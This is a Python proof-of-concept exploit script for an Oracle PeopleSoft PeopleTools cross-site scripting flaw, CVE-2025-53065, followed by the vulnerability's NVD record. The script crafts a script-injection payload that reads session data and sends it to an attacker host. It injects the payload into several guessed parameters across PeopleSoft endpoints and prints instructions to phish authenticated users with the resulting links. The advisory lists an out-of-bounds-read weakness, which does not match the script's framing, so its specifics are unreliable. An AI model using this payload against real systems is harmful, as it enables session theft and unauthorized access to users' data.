CVE-2025-53065

# CVE-2025-53065 - Oracle PeopleSoft PeopleTools PIA Core Technology XSS PoC # This PoC demonstrates a reflected/stored XSS attack vector via PIA Core Technology # Note: Requires a victim user to be authenticated and click the malicious link import requests from urllib.parse import urlencode, quote TARGET_URL = "https://target-peoplesoft.example.com/psp/ps/" # PIA Core Technology common endpoints PIA_ENDPOINTS = [ "/psp/ps/?cmd=login", "/psp/ps/EMPLOYEE/HRMS/c/ROLE_EMPLOYEE.TL_EMPLOYEE_HOME.GBL", "/psc/ps/EMPLOYEE/HRMS/c/ROLE_EMPLOYEE.TL_EMPLOYEE_HOME.GBL" ] def craft_xss_payload(): """Craft a malicious XSS payload targeting PIA Core Technology parameters""" # JavaScript payload to steal session and perform unauthorized actions js_payload = ( "var xhr = new XMLHttpRequest();" "xhr.open('GET', '/psp/ps/EMPLOYEE/HRMS/c/SESSION_INFO.GBL', true);" "xhr.onload = function() {" " var data = xhr.responseText;" " new Image().src = 'https://attacker.example.com/exfil?d=' + btoa(data);" "};" "xhr.send();" ) return js_payload def build_malicious_url(endpoint, vulnerable_param, payload): """Build a malicious URL with injected XSS payload""" # Inject payload into a commonly reflected parameter in PIA components params = { vulnerable_param: f"<script>{payload}</script>", "ICType": "Panel", "ICElementNum": "0" } malicious_url = f"{TARGET_URL.rstrip('/')}{endpoint}?{urlencode(params)}" return malicious_url def deliver_payload(malicious_url): """Simulate delivery of the malicious URL to the victim""" print(f"[*] Malicious URL crafted: {malicious_url}") print("[*] Send this URL to an authenticated PeopleSoft user via phishing email") print("[*] When the victim clicks, the script executes in their browser context") print("[*] Attack result: Unauthorized data read/modify via victim's session") return malicious_url if __name__ == "__main__": payload = craft_xss_payload() # Common vulnerable parameters in PIA Core Technology vulnerable_params = ["ICValue", "PAGE", "SEARCHTEXT", "KEYWORDS"] for endpoint in PIA_ENDPOINTS: for param in vulnerable_params: url = build_malicious_url(endpoint, param, payload) deliver_payload(url) print("---") # Example malicious URL format: # https://target/psp/ps/?ICValue=<script>var xhr=new XMLHttpRequest();xhr.open('GET','/psp/ps/EMPLOYEE/HRMS/c/SESSION_INFO.GBL',true);xhr.onload=function(){new Image().src='https://attacker.com/exfil?d='+btoa(xhr.responseText);};xhr.send();</script> # Mitigation: Apply Oracle CPU October 2025 patch for PeopleTools 8.60/8.61/8.62

{"cve": {"id": "CVE-2025-53065", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:47.013", "lastModified": "2025-10-23T16:08:26.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: PIA Core Technology). Supported versions that are affected are 8.60, 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise PeopleTools accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise PeopleTools accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.60:*:*:*:*:*:*:*", "matchCriteriaId": "AF191D4F-3D54-4525-AAF5-B70D3FD2F818"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.61:*:*:*:*:*:*:*", "matchCriteriaId": "18F15FC6-947A-462A-8329-C52907799A7C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.62:*:*:*:*:*:*:*", "matchCriteriaId": "FF0E4EFC-096B-4861-8D55-D8DAA37A21E9"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}